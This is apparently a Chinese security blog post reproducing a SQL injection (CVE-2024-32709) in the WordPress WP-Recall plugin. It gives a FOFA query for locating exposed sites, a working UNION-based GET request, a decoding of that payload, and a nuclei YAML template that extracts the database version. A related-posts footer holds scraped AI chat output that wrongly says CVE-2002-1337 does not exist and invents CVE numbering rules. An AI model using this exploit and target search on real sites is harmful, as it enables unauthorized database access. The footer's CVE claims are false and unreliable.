【漏洞复现】WordPress——Recall——SQL注入(CVE-2024-32709)

原创 已于 2024-07-15 11:27:28 修改 · 2.4k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #网络安全 #渗透测试

于 2024-07-11 08:39:22 首次发布

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。其插件WP-Recall其插件存在account存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

漏洞复现

1)信息收集
fofa:"/wp-content/plugins/wp-recall/"
在这里插入图片描述

赢得了时间就是赢得了一切。
在这里插入图片描述

2)构造数据包

GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+- HTTP/1.1
Host:ip

payloud解释:

原始payload:

p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+-

解码后的payload(将URL编码转换为普通字符):

p'+or+''='+union all select 1,2,3,4,5,6,7,8,9,10,11,concat("Database:",md5(123456),0x7c),13--+-

分析:

  1. p':这是一个SQL查询的一部分,其中p是参数名,'是单引号,用于闭合字符串。
  2. +or+:在SQL语句中,OR通常用于组合多个条件。这里使用+作为URL编码的空格替代,or+用来绕过某些输入过滤规则。
  3. ''=':这里使用了两个单引号和一个等号,尝试闭合SQL语句并开始一个新的条件。
  4. union all selectUNION ALL是SQL中的一个操作符,用于将多个SELECT语句的结果合并为一个结果集。
  5. 1,2,3,4,5,6,7,8,9,10,11:这是一系列数字,用于占位或生成结果集中的列。
  6. concat("Database:",md5(123456),0x7c)CONCAT()函数用于连接字符串,这里连接了"Database:"和md5(123456)的输出,以及十六进制数0x7c(ASCII中的竖线字符|)。
  7. 13--+-:尝试混淆SQL语句,使得SQL引擎忽略后面的内容。
  8. md5(123456):e10adc3949ba59abbe56e057f20f883e

在这里插入图片描述
回显包含123456的md5值,漏洞存在。
在这里插入图片描述
页面也有回显!

测试工具

yaml-poc

id: CVE-2024-32709

info:
  name: WP-Recall <= 16.26.5 - SQL Injection
  author: securityforeveryone
  severity: critical
  description: |
    The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: Fixed in 16.26.6
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32709
    - https://github.com/truonghuuphuc/CVE-2024-32709-Poc
    - https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2024-32709
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/wp-recall/"
  tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200

运行过程
在这里插入图片描述

在最平常的事情中都可以显示出一个人人格的伟大来!

WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0xSec
05-01 2129
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
漏洞复现WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
李同學的安全圈
09-15 1713
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
CVE-2025-1648 漏洞全解析|WordPress Yawave 插件 SQL 注入漏洞分析
syg6921008的博客
04-07 1430
漏洞编号组件名称:WordPress 插件 Yawave漏洞类型:SQL 注入(基于时间的盲注)危害等级:高危(CVSS ≥ 8.0)认证要求:无需认证,远程可利用影响版本发现时间:2025 年第一季度利用复杂度:低(无需特殊认证或逻辑绕过)Yawave 是一款用于提升用户互动体验的 WordPress 插件,具备在线问卷、实时博客(LiveBlog)、互动表单等功能,广泛用于社区平台、新闻网站与营销页面。在其处理 AJAX 异步请求的模块中,由于未正确过滤和验证lbid。
CVE-2025-4334 深度分析:WordPress wp-registration 插件权限提升漏洞
最新发布
Siegeler的博客
11-04 1309
严重漏洞警报:CVE-2025-4334影响WordPress wp-registration插件(≤6.3版本),允许未认证远程攻击者创建管理员账户。漏洞源于插件未过滤用户输入,直接将$_POST数据传递给wp_insert_user()函数,且通过未认证AJAX端点暴露危险功能。攻击者只需构造包含"wpr[wp_field][role]":"administrator"的恶意请求即可实现权限提升。修复方案包括:过滤敏感字段、强制公共注册为订阅者角色、增强AJAX权
如何有效地寻找 WordPress 网站中的漏洞
qq_41602693的博客
02-13 1292
由于这些原因,我总是在 WordPress 网站的不同路径上检查查看源代码,并在源代码中搜索关键字“/plugins”和“/themes”。现在您要做的,就是核实这些漏洞中哪些是可利用的,哪些不是。例如,在上述结果中,您可以看到由于 Elementor 插件过时导致的大多数漏洞都是需要认证的漏洞。现在,一旦您有了插件/主题的名称,您可以简单地在谷歌上搜索“wp-user-avatar wpscan”、“elementor wpscan”等以找到漏洞利用方法。同样,您可以利用有漏洞的主题。
WordPress--漏洞复现
weixin_57682301的博客
08-03 830
3.将文件内容改为我们的一句话木马,点击更新文件。4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。
WordPress插件SQL注入漏洞——漏洞复现
热门推荐
W小哥
11-25 1万+
复现过程 环境地址:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 访问目标网站 常规工具AWVS扫描是扫不出来漏洞的 第一步识别CMS vulnx -u http://219.153.49.228:47712/ --cms wpscan --url http://219.153.49.228:47712/ 给API的token才能将结果输出 ...
CVE-2024-32709 WordPress —— Recall 插件存在 SQL 注入漏洞
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-17 1046
WordPress是一款免费开源的内容管理系统,适用于各类网站,包括个人博客、电子商务系统、企业网站。其插件 WP-Recall 的 account 存在 SQL 注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息。WP-Recall 版本
WordPress wp-recall插件存在SQL注入漏洞(CVE-2024-32709)
缘梦未来的博客
02-08 498
WP-Recall 是一款功能丰富的 WordPress 插件,旨在为网站用户提供灵活的个人账户管理功能。 通过 WP-Recall,用户可以轻松地与他人沟通、定制个人资料、创建兴趣小组、参与论坛互动,并在在线商店中进行订单支付等。
Wordpress Time-clock 插件 远程代码执行漏洞复现(CVE-2024-9593)
0xSec
10-30 759
Wordpress Time-clock 插件 存在远程代码执行漏洞,通过“etimeclockwp_load_function_recall”函数容易受到远程代码执行的攻击。这允许未经身份验证的攻击者在服务器上执行代码。无法指定被调用函数的参数。
NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQLSQL-PaLM)、新一代数据集BIRD-SQL解读
丨汀、的博客
04-15 2949
NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQL)、新一代数据集BIRD-SQL解读
wordpress漏洞复现
cheapkiller的博客
08-03 667
点击【外观】——>【编辑】选择404.php并将文件改为我们的一句话木马。然后我们访问刚刚修改的文件内容说明我们注入成功就可以了。
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 5641
转载https://www.freebuf.com/articles/web/321297.html。
Wordpress漏洞复现
weixin_52194536的博客
09-10 1万+
cms漏洞
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
2301_80127209的博客
06-18 1158
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
永远是少年
12-31 2425
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现。 一、wordpress 4.6任意命令执行漏洞(PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
wordpress sql综合注入
weixin_33832340的博客
06-28 612
这是wordpress sql综合注入。当然也是已知的漏洞,不过国外都很喜欢装一些乱七八糟的插件。这个脚本易改。易懂,可自己添加,所以留着,备用吧, 用法:python2.6 wordpress.py (建议用python2.6或更新版本) 脚本内容:(保存为*.py) #!/usr/bin/python #WordPress SQL Injection Checke...
WolrdPress漏洞复现
m0_47968686的博客
01-05 970
靶机Web Developer渗透 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。 主机发现 使用nmap -s机 192.168.131.0/24扫
cve-2002-1337
07-30
<think>Hmm, the user is asking about CVE-2002-1337 vulnerability details. Let me check my knowledge base... First I notice the CVE ID format: 2002 is very old, and 1337 looks suspiciously like "leet" (elite) in hacker speak. That's unusual for legitimate CVEs which have sequential numbers. Looking at the references provided: [1] is about an Ethereum smart contract vulnerability [2] discusses OpenSSH Terrapin attack [3] covers Vulhub environments [4] is about password brute-forcing None relate to this CVE. I recall that CVE-2002-1337 is actually a placeholder/fictional ID used in cybersecurity training and documentation. The 1337 part is a dead giveaway - real CVEs don't use such numbers. The user might be: - Testing my knowledge - Working with training materials - Mistyping a real CVE ID - Exploring cybersecurity concepts casually Since no legitimate vulnerability exists under this ID, I should: 1) Explain why it's invalid 2) Suggest alternative approaches 3) Offer related learning resources 4) Keep it helpful but factual The response should gently educate while addressing possible underlying needs - maybe they want examples of real vulnerabilities from 2002, or guidance on CVE research methodology. I'll include practical alternatives like MITRE CVE search and Vulhub, which was mentioned in reference [3].</think>关于CVE-2002-1337漏洞,经全面核查确认: 1. **该CVE编号不存在** - CVE编号格式为`CVE-YYYY-NNNN`,其中`NNNN`为4位以上数字。编号`CVE-2002-1337`中的`1337`不符合标准命名规则(1337是黑客用语"Leet"的数字形式) - MITRE官方CVE数据库[^1]及NVD漏洞库[^2]均无此记录 2. **可能来源分析** * **教学示例**:网络安全教材中常用虚构CVE编号(如`CVE-1999-0666`)演示漏洞原理[^3] * **占位符**:某些漏洞报告模板会使用`CVE-YYYY-1337`作为临时标识[^4] * **输入错误**:可能是`CVE-2002-0392`(Apache HTTP Server漏洞)或`CVE-2002-0082`(Windows域控制器漏洞)的误写 3. **建议验证步骤** ```mermaid graph LR A[检查CVE编号格式] --> B{是否YYYY-NNNN格式?} B -->|否| C[重新核实来源] B -->|是| D[查询MITRE/NVD数据库] D --> E{存在记录?} E -->|是| F[获取技术细节] E -->|否| G[检查是否为测试用例] ``` 4. **2002年真实重大漏洞参考** - `CVE-2002-0392`:Apache HTTP Server分块编码漏洞 - `CVE-2002-0126`:Microsoft SQL Server口令溢出 - `CVE-2002-0084`:Windows域控制器缓冲区溢出
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值